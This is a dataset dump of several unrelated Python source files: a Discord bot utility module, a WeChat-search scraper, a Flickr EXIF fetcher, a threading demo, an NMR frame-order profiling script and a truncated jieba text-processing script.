analyse_dict.update({generation:res[best_index]})\r\n \r\n end_stamp = time.time()\r\n\r\n print(\"Most fitted DNA:\", best_schedule)\r\n print(\"Most fitted cost:\", best_cost)\r\n \r\n print()\r\n# print(\"Optimal cost:\", elite_cost)\r\n# print(\"Optimal schedule:\", elite_schedule)\r\n print(\"Time consumption:\", end_stamp-start_stamp)\r\n \r\n print()\r\n \r\n print(\"Original schedule: \", original_schedule)\r\n print(\"Original schedule start time:\", first_start_time)\r\n print(\"Original cost: \", get_energy_cost(original_schedule, first_start_time, job_dict_new, price_dict_new, raw_material_unit_price_dict)+\r\n get_failure_cost(original_schedule, first_start_time, job_dict_new, failure_dict_new, raw_material_unit_price_dict))\r\n \r\n \r\n # write the result to csv for plot\r\n with open('ga_013_analyse_plot.csv', 'w', newline='\\n') as csv_file:\r\n writer = csv.writer(csv_file)\r\n for key, value in 
analyse_dict.items():\r\n writer.writerow([key, value])\r\n ","sub_path":"ELITEPython/ELITE_Simulation/GAAnalysePlot013.py","file_name":"GAAnalysePlot013.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602458182","text":"import discord\nimport logging\nfrom discord.ext import commands\nimport re\nimport math\nimport random\nimport asyncio\nimport urllib.request\nimport urllib\nimport sqlite3\nimport os\nimport platform\nimport time\nfrom datetime import datetime,timedelta,date\nfrom calendar import timegm\nimport sys\nimport aiohttp\n\n#Emoji code\n##Constants to define emoji codes to use in strings\nEMOJI_COOKIE = str(chr(0x1F36A))\nEMOJI_CAKE = str(chr(0x1F370))\nEMOJI_MUSICNOTES = str(chr(0x1F3B6))\nEMOJI_ROBOT = str(chr(0x1F916))\nEMOJI_SKULL = str(chr(0x1F480))\nEMOJI_WINK = str(chr(0x1F609))\nEMOJI_BELL = str(chr(0x1F514))\nEMOJI_EYEROLL = str(chr(0x1F644))\nEMOJI_BICEPS = str(chr(0x1F4AA))\nEMOJI_NECKLACE = str(chr(0x1F4FF))\nEMOJI_WINEGLASS = str(chr(0x1F377))\nEMOJI_FIRE = str(chr(0x1F525))\nEMOJI_SNOWFLAKE = str(chr(0x2744))\nEMOJI_BLOSSOM = str(chr(0x1F33C))\nEMOJI_DAGGER = str(chr(0x1F5E1))\nEMOJI_BULLSEYE = str(chr(0x1F3AF))\nEMOJI_WHIRLYEYES = str(chr(0x1F632))\n\nfrom config import *\nbot = \"\"\n\n#Global constants\nERROR_NETWORK = 0\nERROR_DOESNTEXIST = 1\n\n#Start logging\n#Create logs folder\nos.makedirs('logs/',exist_ok=True)\n##discord.py log\ndiscord_log = logging.getLogger('discord')\ndiscord_log.setLevel(logging.INFO)\nhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='a')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\ndiscord_log.addHandler(handler)\n##NabBot log\nlog = logging.getLogger(__name__ )\nlog.setLevel(logging.DEBUG)\n###Save log to file (info level)\nfileHandler = logging.FileHandler(filename='logs/nabbot.log', encoding='utf-8', mode='a') \nfileHandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\nfileHandler.setLevel(logging.INFO)\nlog.addHandler(fileHandler)\n###Print output to console too (debug level)\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\nconsoleHandler.setLevel(logging.DEBUG)\nlog.addHandler(consoleHandler)\n\n#Database global connections\nuserDatabase = sqlite3.connect(USERDB)\ntibiaDatabase = sqlite3.connect(TIBIADB)\n\nDB_LASTVERSION = 2\n\ndef initDatabase():\n #Database file is automatically created with connect, now we have to check if it has tables\n print(\"Checking database version...\")\n db_version = 0\n try:\n c = userDatabase.cursor()\n c.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'\")\n result = c.fetchone()\n #Database is empty\n if(result is None or result[0] == 0):\n c.execute(\"\"\"CREATE TABLE discord_users (\n id\tINTEGER NOT NULL,\n weight\tINTEGER DEFAULT 5,\n PRIMARY KEY(id)\n )\"\"\")\n c.execute(\"\"\"CREATE TABLE chars (\n id\tINTEGER PRIMARY KEY AUTOINCREMENT,\n user_id\tINTEGER,\n name\tTEXT,\n last_level\tINTEGER DEFAULT -1,\n last_death_time\tTEXT\n )\"\"\")\n c.execute(\"\"\"CREATE TABLE char_levelups (\n char_id\tINTEGER,\n level\tINTEGER,\n date\tINTEGER\n )\"\"\") \n c.execute(\"SELECT tbl_name FROM sqlite_master WHERE type = 'table' AND name LIKE 'db_info'\")\n result = c.fetchone();\n #If there's no version value, version 1 is assumed\n if(result is None):\n c.execute(\"\"\"CREATE TABLE db_info 
(\n key\tTEXT,\n value\tTEXT\n )\"\"\")\n c.execute(\"INSERT INTO db_info(key,value) VALUES('version','1')\")\n db_version = 1\n print(\"No version found, version 1 assumed\")\n else:\n c.execute(\"SELECT value FROM db_info WHERE key LIKE 'version'\")\n db_version = int(c.fetchone()[0])\n print(\"Version {0}\".format(db_version))\n if db_version == DB_LASTVERSION:\n print(\"Database is up to date.\")\n return\n #Future code to patch database changes\n if db_version == 1:\n #Apply changes\n c.execute(\"ALTER TABLE chars ADD vocation TEXT\")\n c.execute(\"UPDATE chars SET last_level = 0 WHERE last_level = -1\")\n db_version +=1\n print(\"Updated database to version {0}\".format(db_version))\n c.execute(\"UPDATE db_info SET value = ? WHERE key LIKE 'version'\",(db_version,))\n \n finally:\n userDatabase.commit()\n\ndef vocAbb(vocation):\n abbrev = {'None' : 'N', 'Druid' : 'D', 'Sorcerer' : 'S', 'Paladin' : 'P', 'Knight' : 'K',\n 'Elder Druid' : 'ED', 'Master Sorcerer' : 'MS', 'Royal Paladin' : 'RP', 'Elite Knight' : 'EK'}\n try:\n return abbrev[vocation]\n except KeyError:\n return 'N'\n\ndef getLogin():\n if not os.path.isfile(\"login.py\"):\n print(\"This seems to be the first time NabBot is ran (or login.py is missing)\")\n print(\"To run your own instance of NabBot you need to create a new bot account to get a bot token\")\n print(\"https://discordapp.com/developers/applications/me\")\n print(\"Alternatively, you can use a regular discord account for your bot, althought this is not recommended\")\n print(\"Insert a bot token OR an e-mail address for a regular account to be used as a bot\")\n login = input(\">>\")\n email = \"\";\n password = \"\"\n token = \"\"\n if \"@\" in login:\n email = login\n password = input(\"Enter password: >>\")\n elif len(login) >= 50:\n token = login\n else:\n input(\"What you entered isn't a token or an e-mail. Restart NabBot to retry.\")\n quit()\n f = open(\"login.py\",\"w+\")\n f.write(\"#Token always has priority, if token is defined it will always attempt to login using a token\\n\")\n f.write(\"#Comment the token line or set it empty to use email login\\n\")\n f.write(\"token = '{0}'\\nemail = '{1}'\\npassword = '{2}'\\n\".format(token,email,password))\n f.close()\n print(\"Login data has been saved correctly. 
You can change this later by editing login.py\")\n input(\"Press any key to start NabBot now...\")\n quit()\n return __import__(\"login\")\n\ndef utilsGetBot(_bot):\n global bot\n bot = _bot\n \n\n########formatMessage\n##handles stylization of messages, uppercasing \\TEXT/, lowercasing /text\\ and title casing /Text/\ndef formatMessage(message):\n upper = r'\\\\(.+?)/'\n upper = re.compile(upper,re.MULTILINE+re.S)\n lower = r'/(.+?)\\\\'\n lower = re.compile(lower,re.MULTILINE+re.S)\n title = r'/(.+?)/'\n title = re.compile(title,re.MULTILINE+re.S)\n skipproper = r'\\^(.+?)\\^(.+?)([a-zA-Z])'\n skipproper = re.compile(skipproper,re.MULTILINE+re.S)\n message = re.sub(upper,lambda m: m.group(1).upper(), message)\n message = re.sub(lower,lambda m: m.group(1).lower(), message)\n message = re.sub(title,lambda m: m.group(1).title(), message)\n message = re.sub(skipproper,lambda m: m.group(2)+m.group(3) if m.group(3).istitle() else m.group(1)+m.group(2)+m.group(3) , message)\n return message\n########\n\n########weighedChoice\n##makes weighed choices from message lists where [0] is a value representing the relative odds of picking a message\n###and [1] is the message string\ndef weighedChoice(messages,condition1=False,condition2=False):\n ##find the max range by adding up the weigh of every message in the list\n #and purge out messages that dont fulfil the conditions\n range = 0\n _messages = []\n for message in messages:\n if len(message) == 4:\n if (not message[2] or condition1 in message[2]) and (not message[3] or condition2 in message[3]):\n range = range+message[0]\n _messages.append(message)\n elif len(message) == 3:\n if (not message[2] or condition1 in message[2]):\n _messages.append(message)\n else:\n range = range+message[0]\n _messages.append(message)\n #choose a random number\n rangechoice = random.randint(0, range)\n #iterate until we find the matching message\n rangepos = 0\n for message in _messages:\n if rangechoice >= rangepos and rangechoice < rangepos+message[0]:\n return message[1]\n rangepos = rangepos+message[0]\n #this shouldnt ever happen...\n print(\"Error in weighedChoice!\")\n return _messages[0][1]\n########\n\n########getChannelByServerAndName\n##server_name can be left blank in which case all servers the bot is connected to will be searched\ndef getChannelByServerAndName(server_name : str, channel_name : str):\n if server_name == \"\":\n channel = discord.utils.find(lambda m: m.name == channel_name and not m.type == discord.ChannelType.voice, bot.get_all_channels())\n else:\n channel = discord.utils.find(lambda m: m.name == channel_name and not m.type == discord.ChannelType.voice, getServerByName(server_name).channels)\n return channel\n\n########getChannelByName\n##alias for getChannelByServerAndName(\"\",channel_name)\n##main server is given priority, next all visible servers are searched.\ndef getChannelByName(channel_name : str):\n channel = getChannelByServerAndName(mainserver,channel_name)\n if channel is None:\n return getChannelByServerAndName(\"\",channel_name)\n return channel\n \n########getServerByName\ndef getServerByName(server_name : str):\n server = discord.utils.find(lambda m: m.name == server_name, bot.servers)\n return server\n########\n\n########getUserByName\n##this gets a discord user by its name\n##currently, duplicate usernames will return the first user found(!)\n##priority is given to users in the main server, next all visible channels are searched and finally private channels.\ndef getUserByName(userName):\n user = None\n _mainserver = 
getServerByName(mainserver)\n if _mainserver is not None:\n user = discord.utils.find(lambda m: m.name.lower() == userName.lower(), _mainserver.members)\n if user is None:\n user = discord.utils.find(lambda m: m.name.lower() == userName.lower(), bot.get_all_members())\n if user is None:\n user = discord.utils.find(lambda m: m.user.name.lower() == userName.lower(), bot.private_channels)\n return user\n########\n\n########getUserById\n##this gets a discord user by its id\ndef getUserById(userId):\n user = discord.utils.find(lambda m: m.id == str(userId), bot.get_all_members())\n if user is None:\n user = discord.utils.find(lambda m: m.user.id == str(userId), bot.private_channels)\n return user\n########\n\n#Returns your local time zone\ndef getLocalTimezone():\n #Getting local time and GMT\n t = time.localtime()\n u = time.gmtime(time.mktime(t))\n #UTC Offset\n return ((timegm(t) - timegm(u))/60/60)\n \n##Returns Germany's timezone, considering their daylight saving time dates\ndef getTibiaTimeZone():\n #Find date in Germany\n gt = datetime.utcnow()+timedelta(hours=1)\n germany_date = date(gt.year,gt.month,gt.day)\n dst_start = date(gt.year,3,(31 - (int(((5 * gt.year) / 4) + 4) % int(7))))\n dst_end = date(gt.year,10,(31 - (int(((5 * gt.year) / 4) + 1) % int(7))))\n if dst_start < germany_date < dst_end:\n return 2\n return 1","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"128461559","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom weixin.weixin.weixin_article import WeixinArticle\nfrom requests.exceptions import ConnectionError\nfrom pyquery import PyQuery as pq\n\n\nclass SeleniumWeixinArticle(WeixinArticle):\n \"\"\"使用selenium模拟浏览器,获取搜狗微信搜索的详细信息,继承WeixinArticle这个类\"\"\"\n proxy = None\n\n def __init__(self):\n \"\"\"初始化浏览器,及部分浏览器信息\"\"\"\n self.browser = webdriver.Chrome(executable_path=\"C:/codeapp/seleniumDriver/chrome/chromedriver.exe\")\n self.wait = WebDriverWait(self.browser, 10)\n super(SeleniumWeixinArticle, self).__init__()\n\n def get_html(self, url, count=1):\n \"\"\"重写WeixinArticle 中的get_html 用selenium模拟浏览器去获取搜狗微信搜索的信息\"\"\"\n if not url:\n return None\n # 最后递归max_count这么多次,防止无限递归\n if count >= self.max_count:\n print(\"try many count \")\n return None\n print('crowling url ', url)\n print('crowling count ', count)\n global proxy\n if self.proxy:\n proxy_ip = '--proxy-server=http://' + self.proxy\n chrome_options = webdriver.ChromeOptions()\n # 切换IP\n chrome_options.add_argument(proxy_ip)\n browser = self.browser(chrome_options=chrome_options)\n else:\n browser = self.browser\n try:\n browser.get(url) # 返回值是None,要取数直接用browser.page_source\n next_page = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#sogou_next\")))\n if browser.current_url == url:\n page_source = browser.page_source\n return page_source\n else:\n print(\"must change ip proxy \")\n proxy = self.get_proxy(self.proxy_pool_url)\n if proxy:\n return self.get_html(url)\n else:\n print(\"get proxy is faired \")\n return None\n except ConnectionError:\n count += 1\n proxy = self.get_proxy(self.proxy_pool_url)\n return self.get_html(url, count)\n\n\n\nif __name__ == \"__main__\":\n weixin_article = SeleniumWeixinArticle()\n 
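# --- Editor's aside (a hedged sketch, not part of the original record): get_html above retries on ConnectionError, swapping in a fresh proxy from the pool and bounding the attempts with self.max_count; the same retry shape written iteratively, with every name below hypothetical:\n    def _retry_fetch(fetch, rotate_proxy, max_count=5):\n        # Try fetch up to max_count times, rotating the proxy between failures.\n        for _ in range(max_count):\n            try:\n                return fetch()\n            except ConnectionError:  # requests' ConnectionError, imported at the top of this file\n                rotate_proxy()\n        return None\n    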
weixin_article.run()\n","sub_path":"outback/weixin/weixin/selenium_weixin.py","file_name":"selenium_weixin.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252314061","text":"#!/usr/bin/env python\n\n\"\"\"Some documentation would be nice!\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\n__author__ = 'eric.hanchrow@gmail.com'\n\n# Core\nimport collections\nimport datetime\nimport os\nimport pprint\nimport sys\n\n# 3rd-party\nimport configobj # pip install configobj\nimport flickrapi # pip install flickrapi\n\n\ndef get_auth_stuff(filename=None):\n if filename is None:\n filename = os.path.expanduser('~/.flickr-auth')\n\n c = configobj.ConfigObj(filename)\n\n return(c['flickr']['api_key'],\n c['flickr']['shared_secret'])\n\napi_key, shared_secret = get_auth_stuff()\n\nflickr = flickrapi.FlickrAPI(api_key, shared_secret)\n\n\ndef dump(thing, indent=0):\n print(' ' * indent, end='')\n print(thing.__class__.__name__,\n repr(thing.tag),\n repr(thing.text),\n thing.items())\n for sub in thing:\n dump(sub, indent + 2)\n\nmy_nsid = flickr.people_findByUsername(username='offby1').find('user').attrib['nsid']\nid_to_exif_tag_to_exif_value = collections.defaultdict(dict)\n\nrequested_page = 1\nwhile True:\n rsp = flickr.photos_search(user_id=my_nsid,\n page=requested_page,\n per_page='10',\n min_upload_date=datetime.datetime(2010, 12, 1))\n photos = rsp.find('photos')\n\n if photos.get('pages') == '0':\n print(\"Hmm, no photos at all.\")\n break\n\n print(\"This is page\", photos.get('page'), \"of\", photos.get('pages'), file=sys.stderr)\n for photo in photos:\n id = photo.get('id')\n print(photo.get('title'), id, \"...\", file=sys.stderr)\n for exif in flickr.photos_getExif(api_key=api_key,\n photo_id=id,\n secret=shared_secret).find('photo').findall('exif'):\n id_to_exif_tag_to_exif_value[id][exif.get('tag')] = exif.find('raw').text\n\n if int(photos.get('page')) >= int(photos.get('pages')):\n print(\"That's all!\")\n break\n\n requested_page += 1\n\npprint.pprint(dict(id_to_exif_tag_to_exif_value))\n# sets = flickr.photosets_getList(user_id='73509078@N00')\n","sub_path":"python/flickr.py","file_name":"flickr.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"445876015","text":"import threading\nimport logging\nimport time\n\nlogging.basicConfig(level=logging.DEBUG,\n format=\"{asctime} {name} {levelname} - {message}\", style=\"{\")\nlog = logging.getLogger()\n\n\nclass SeqNum():\n __seq_num = None\n __mutex = threading.Lock()\n\n @classmethod\n def get(cls):\n with cls.__mutex:\n if cls.__seq_num is None:\n cls.__seq_num = 1\n else:\n cls.__seq_num += 1\n\n time.sleep(2)\n return cls.__seq_num\n\n\ndef do_handle():\n log.debug(SeqNum.get())\n\n\ndef main():\n try:\n thread_list = []\n for index in range(2):\n t = threading.Thread(target=do_handle, name=\"thread\" + str(index))\n t.start()\n thread_list.append(t)\n\n for t in thread_list:\n t.join(timeout=0.5)\n\n except KeyboardInterrupt as e:\n pass\n except Exception as e:\n log.error(\"Error occurrend: {}\".format(e))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_class/py_seq_num.py","file_name":"py_seq_num.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448275567","text":"\"\"\"Script for 
profiling the pseudo-ellipse model.\n\nThe user functions below were obtained by running:\n\n$ ./relax -sd Frame_order.test_cam_iso_cone | grep \"relax>\" > log\n\nTo profile, set the profiling flag in the 'relax' file.\n\"\"\"\n\n# Python module imports.\nfrom numpy import array, float64\n\n# relax module imports.\nfrom specific_analyses.frame_order.optimisation import target_fn_setup\n\n\n# All the user functions from the Frame_order.test_cam_pseudo_ellipse system test until the first target function call.\npipe.create(pipe_name='frame order', pipe_type='frame order', bundle=None)\nstructure.read_pdb(file='1J7O_1st_NH.pdb', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/', read_mol=None, set_mol_name='N-dom', read_model=None, set_model_num=None, alt_loc=None, verbosity=1, merge=False)\nstructure.read_pdb(file='1J7P_1st_NH_rot.pdb', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/', read_mol=None, set_mol_name='C-dom', read_model=None, set_model_num=None, alt_loc=None, verbosity=1, merge=False)\nstructure.load_spins(spin_id='@N', mol_name_target=None, ave_pos=False)\nstructure.load_spins(spin_id='@H', mol_name_target=None, ave_pos=False)\nspin.isotope(isotope='15N', spin_id='@N', force=False)\nspin.isotope(isotope='1H', spin_id='@H', force=False)\ninteratom.define(spin_id1='@N', spin_id2='@H', direct_bond=True, pipe=None)\ninteratom.set_dist(spin_id1='@N', spin_id2='@H', ave_dist=1.041e-10, unit='meter')\ninteratom.unit_vectors(ave=True)\nrdc.read(align_id='dy', file='rdc_dy.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='dy', file='pcs_dy_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='dy', temp=303)\nspectrometer.frequency(id='dy', frq=900000000.0, units='Hz')\nrdc.read(align_id='tb', file='rdc_tb.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='tb', file='pcs_tb_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='tb', temp=303)\nspectrometer.frequency(id='tb', frq=900000000.0, units='Hz')\nrdc.read(align_id='tm', file='rdc_tm.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='tm', file='pcs_tm_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='tm', temp=303)\nspectrometer.frequency(id='tm', frq=900000000.0, 
units='Hz')\nrdc.read(align_id='er', file='rdc_er.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='er', file='pcs_er_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='er', temp=303)\nspectrometer.frequency(id='er', frq=900000000.0, units='Hz')\nscript(file='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/tensors.py', dir=None)\nalign_tensor.init(tensor='Dy N-dom', align_id='dy', domain=None, params=(0.000622191953772, 1.35210609663e-05, -0.000133742852942, 0.000756743581636, 0.000550729840729), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Dy N-dom', align_id='dy', domain=None, params=(2.35766523882e-05, 2.51785772774e-05, 1.99369755031e-05, 1.86674275393e-05, 2.01343581166e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Tb N-dom', align_id='tb', domain=None, params=(0.000617222650166, -0.000438128542649, -0.000375477068228, 0.000760687126774, 0.00034129025543), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Tb N-dom', align_id='tb', domain=None, params=(1.63152405109e-05, 1.86581336167e-05, 1.34361351013e-05, 1.46648001703e-05, 1.76633948194e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Tm N-dom', align_id='tm', domain=None, params=(-0.000385660891266, 0.000325292994524, 0.000318318888621, -0.00044409190064, -0.000473507384479), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Tm N-dom', align_id='tm', domain=None, params=(1.47916817671e-05, 1.81460089395e-05, 1.27148330285e-05, 1.54915569205e-05, 1.55953362766e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Er N-dom', align_id='er', domain=None, params=(-0.000187529356988, 0.000130813961653, 7.14700966617e-05, -0.000264275852243, -0.000343164086618), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Er N-dom', align_id='er', domain=None, params=(1.88459382279e-05, 1.66197299895e-05, 1.69306486018e-05, 2.12500669486e-05, 1.96610327688e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\ndomain(id='N', spin_id='#N-dom')\ndomain(id='C', spin_id='#C-dom')\nalign_tensor.init(tensor='Dy C-dom', align_id='dy', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Dy N-dom', domain='N')\nalign_tensor.set_domain(tensor='Dy C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Dy N-dom', red_tensor='Dy C-dom')\nalign_tensor.init(tensor='Tb C-dom', align_id='tb', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Tb N-dom', domain='N')\nalign_tensor.set_domain(tensor='Tb C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Tb N-dom', red_tensor='Tb C-dom')\nalign_tensor.init(tensor='Tm C-dom', align_id='tm', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Tm N-dom', 
domain='N')\nalign_tensor.set_domain(tensor='Tm C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Tm N-dom', red_tensor='Tm C-dom')\nalign_tensor.init(tensor='Er C-dom', align_id='er', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Er N-dom', domain='N')\nalign_tensor.set_domain(tensor='Er C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Er N-dom', red_tensor='Er C-dom')\nframe_order.select_model(model='iso cone')\nframe_order.ref_domain(ref='N')\nframe_order.pivot(pivot=array([ 37.254001617431641, 0.5, 16.746500015258789], dtype=float64), order=1, fix=True)\nparamag.centre(pos=[35.934, 12.194, -4.206], atom_id=None, pipe=None, verbosity=1, fix=True, ave_pos=True, force=False)\nframe_order.num_int_pts(num=2000)\nvalue.set(val=-21.269217407269576, param='ave_pos_x', index=0, spin_id=None, error=False)\nvalue.set(val=-3.122610661328414, param='ave_pos_y', index=0, spin_id=None, error=False)\nvalue.set(val=-2.400652421655998, param='ave_pos_z', index=0, spin_id=None, error=False)\nvalue.set(val=5.623469076122531, param='ave_pos_alpha', index=0, spin_id=None, error=False)\nvalue.set(val=0.435439405668396, param='ave_pos_beta', index=0, spin_id=None, error=False)\nvalue.set(val=5.081265529106499, param='ave_pos_gamma', index=0, spin_id=None, error=False)\nvalue.set(val=0.960079978595343, param='axis_theta', index=0, spin_id=None, error=False)\nvalue.set(val=4.032275506219623, param='axis_phi', index=0, spin_id=None, error=False)\nvalue.set(val=0.6, param='cone_theta', index=0, spin_id=None, error=False)\nvalue.set(val=0.9, param='cone_sigma_max', index=0, spin_id=None, error=False)\n\n\n# Set up the target function for direct calculation.\nmodel, param_vector, scaling_matrix = target_fn_setup(sim_index=None, verbosity=1)\n\n# Make repeated function calls.\nN = 2000\nprint(\"Function calls.\")\nfor i in range(N):\n print(i)\n chi2 = model.func(param_vector)\n","sub_path":"test_suite/shared_data/frame_order/timings/profiling_iso_cone.py","file_name":"profiling_iso_cone.py","file_ext":"py","file_size_in_byte":8980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267246711","text":"# coding=utf-8\nimport collections\nimport math\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport argparse\nimport jieba\nimport time\nimport json\nfrom simhash import 
Simhash,SimhashIndex\n\ntagMap=dict()\ntagMap['1']='EXO'\ntagMap['2']='TFBOYS'\ntagMap['3']='BIGBANG'\ntagMap['4']='鹿晗'\ntagMap['5']='吴亦凡'\ntagMap['6']='明星同人'\ntagMap['7']='总裁豪门'\ntagMap['8']='都市言情'\ntagMap['9']='古代言情'\ntagMap['10']='玄幻言情'\ntagMap['11']='短篇'\ntagMap['12']='鬼故事'\ntagMap['13']='仙侠'\ntagMap['14']='玄幻'\ntagMap['15']='奇幻'\ntagMap['16']='科幻'\ntagMap['17']='热血'\ntagMap['18']='日常'\ntagMap['19']='轻小说'\ntagMap['20']='搞笑'\ntagMap['21']='神魔'\ntagMap['22']='新奇创意'\ntagMap['23']='非人视角'\ntagMap['24']='变身小说'\ntagMap['25']='穿越'\ntagMap['26']='重生'\ntagMap['27']='无限流'\ntagMap['28']='灵异'\ntagMap['29']='游戏'\ntagMap['30']='武侠'\ntagMap['31']='历史'\ntagMap['32']='推理'\ntagMap['33']='耽美纯爱'\ntagMap['34']='都市'\ntagMap['35']='竞技'\ntagMap['36']='军事'\njieba.add_word('同人')\nstop_words=[\"啊\",\"阿\",\"我\",\"哎\",\"哎呀\",\"哎哟\",\"唉\",\"俺\",\"俺们\",\"按\",\"按照\",\"吧\",\"吧哒\",\"把\",\"被\",\"本\",\"本着\",\"比\",\"彼\",\"边\",\"别\",\"别的\",\"别说\",\"并\",\"并且\",\"不比\",\"不成\",\"不单\",\"不但\",\"不独\",\"不管\",\"不光\",\"不过\",\"不仅\",\"不拘\",\"不论\",\"不怕\",\"不然\",\"不如\",\"不特\",\"不惟\",\"不问\",\"不只\",\"朝\",\"朝着\",\"趁\",\"趁着\",\"乘\",\"冲\",\"除\",\"除非\",\"除了\",\"此\",\"此间\",\"此外\",\"从\",\"从而\",\"打\",\"待\",\"但\",\"但是\",\"当\",\"当着\",\"到\",\"得\",\"的\",\"的话\",\"对\",\"对于\",\"多\",\"多少\",\"而\",\"而况\",\"而且\",\"而是\",\"而外\",\"而言\",\"而已\",\"和\",\"啦\",\"之\",\"论\",\"嘛\",\"吗\",\"了\",\"临\",\"另\",\"冒\",\"么\",\"每\",\"们\",\"呢\",\"能\",\"你\",\"你们\",\"您\",\"宁\",\"呸\",\"凭\",\"其\",\"他\",\"他们\",\"他人\",\"它\",\"它们\",\"她\",\"她们\",\"倘\",\"一\",\"又\"]\nnrate=0.01\nprint(\"version:\",version)\n\ndef read_data(data_dir):\n guids = []\n searchs = []\n bookids = []\n packages =[]\n booktags = []\n bookmarks =[]\n with tf.gfile.FastGFile(data_dir,'r') as f:\n for line in f.readlines() :\n cells = line.replace(\"\\n\",\"\").split(\"\\t\");\n if len(cells) == 6:\n guids.append(cells[0])\n cells[1] = cells[1].replace(\"\\\\N\",\"\").replace(\"''\",'').split(\",\");\n cells[4] = cells[4].replace(\"\\\\N\",\"\")\n cells[5] = cells[5].replace(\"\\\\N\", \"\")\n t = []\n for tag in cells[1]:\n for i in list(jieba.cut_for_search(tag)):\n if i is not None and i!='null' and i not in stop_words and i not in t and len(i.lower().strip())>0 :\n t.append(i.lower().strip())\n if cells[4] is not None and cells[4]!='null':\n tag_data = dict(json.loads(cells[4]))\n for key in tag_data.keys():\n score=tag_data[key]\n if score>0 and key in tagMap.keys() and tagMap[key].lower() not in t:\n t.append(tagMap[key].lower())\n booktags.append(tagMap[key].lower())\n if cells[5] is not None and 